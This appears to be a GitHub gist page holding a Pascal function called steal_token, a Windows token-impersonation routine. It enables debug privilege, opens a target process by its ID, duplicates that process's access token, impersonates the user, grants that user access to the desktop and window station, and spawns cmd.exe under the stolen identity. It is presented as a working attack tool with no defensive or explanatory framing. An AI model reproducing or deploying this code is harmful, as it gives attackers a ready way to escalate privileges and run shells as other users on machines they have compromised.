Skip to content

Instantly share code, notes, and snippets.

@zux0x3a

zux0x3a/steal_token.pas

Created June 14, 2022 03:36
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save zux0x3a/e7798f8704f056006ec37967dcd16a77 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save zux0x3a/e7798f8704f056006ec37967dcd16a77 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
steal_token.pas
function steal_token(pid:Dword):string;
const
LOGON_WITH_PROFILE = $00000001;
var
hproc,tokenhandle,hProcessToken,duplicateTokenHandle,currenttokenHandle : Thandle;
gettoken,impersonateUser,createProcess,duplicateToken,getcurrenttoken,isokay:boolean;
si: TStartupInfow;
pi: TPROCESSINFORMATION;
SA: TSecurityAttributes;
tkp: TOKEN_PRIVILEGES;
logger :string;
hdesktop: HDESK;
hwinst, hwinstSave: HWINSTA;
S, DeskTopName, WinStaName: string;
//token_user : TOKEN_USER;
begin
hdesktop := 0;
hwinst := 0;
hwinstSave := 0;
pS := nil;
gettoken := false;
duplicateToken := false;
tokenhandle := 0;
duplicateTokenHandle := 0;
currenttokenHandle := 0;
hproc := 0;
//ZeroMemory(@si, SizeOf(si));
//ZeroMemory(@pi, SizeOf(pi));
getcurrenttoken := OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES, currenttokenHandle);
NTSetPrivilege(SE_DEBUG_NAME,true,currenttokenHandle);
hproc := OpenProcess(MAXIMUM_ALLOWED, true, pid);
getToken := OpenProcessToken(hproc, TOKEN_IMPERSONATE or TOKEN_DUPLICATE or TOKEN_ASSIGN_PRIMARY or TOKEN_QUERY, tokenHandle);
if (gettoken = true) then
logger := '[+] getting the token successfully'#10#13
else
logger := '[x] operation denied'#10;
hwinstSave := GetProcessWindowStation;
hwinst := OpenWindowStation('WinSta0', False, READ_CONTROL or WRITE_DAC);
if not SetProcessWindowStation(hwinst) then
begin
raise exception.create(Format('SetProcessWindowStation(hwinst): %s', [SysErrorMessage(GetLastError)]));
Exit;
end;
hdesktop := OpenDesktop('default', 0, False, READ_CONTROL or WRITE_DAC or DESKTOP_WRITEOBJECTS or DESKTOP_READOBJECTS);
if hdesktop = 0 then
begin
raise exception.create(Format('OpenDesktop: %s', [SysErrorMessage(GetLastError)]));
Exit;
end;
if not SetProcessWindowStation(hwinstSave) then
begin
raise exception.create(Format('SetProcessWindowStation(hwinstSave): %s', [SysErrorMessage(GetLastError)]));
Exit;
end;
// perform impersonation with process token handle
impersonateUser := ImpersonateLoggedOnUser(tokenHandle);
if (impersonateUser) then
logger += '[+] impersonation is okay'#10
else
logger += '[x] operation denied'#10;
if not GetLogonSID(tokenHandle, ps) then
begin
raise exception.create(Format('GetLogonSID: %s', [SysErrorMessage(GetLastError)]));
Exit;
end;
// writeln(sidtostr(ps));
if not AddAceToWindowStation(hwinst, pS) then
begin
raise exception.create(Format('AddAceToWindowStation: %s', [SysErrorMessage(GetLastError)]));
Exit;
end;
if not AddAceToDesktop(hdesktop, pS) then
begin
raise exception.create(Format('AddAceToDesktop: %s', [SysErrorMessage(GetLastError)]));
Exit;
end;
// Call DuplicateTokenEx(), print return code and error code
duplicateToken := DuplicateTokenEx(tokenHandle, TOKEN_ALL_ACCESS or TOKEN_ADJUST_DEFAULT or TOKEN_ADJUST_SESSIONID or TOKEN_QUERY or TOKEN_DUPLICATE or TOKEN_ASSIGN_PRIMARY, nil, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle);
if (duplicateToken = true) then
logger += '[!] duplicating token'#10
else
logger += '[x] operation denied'#10;
ZeroMemory(@si, SizeOf(si));
si.cb := SizeOf(si);
si.lpDesktop := PwideChar('winsta0\default');
// Call CreateProcessWithTokenW(), print return code and error code
isokay := CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE,'c:\windows\system32\cmd.exe', nil, 0, nil, nil, @si, @pi);
if isokay then
logger += '{+} session opened successfully'#10#13
else
raise Exception.Create(SysErrorMessage(GetLastError));
result := logger;
end;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment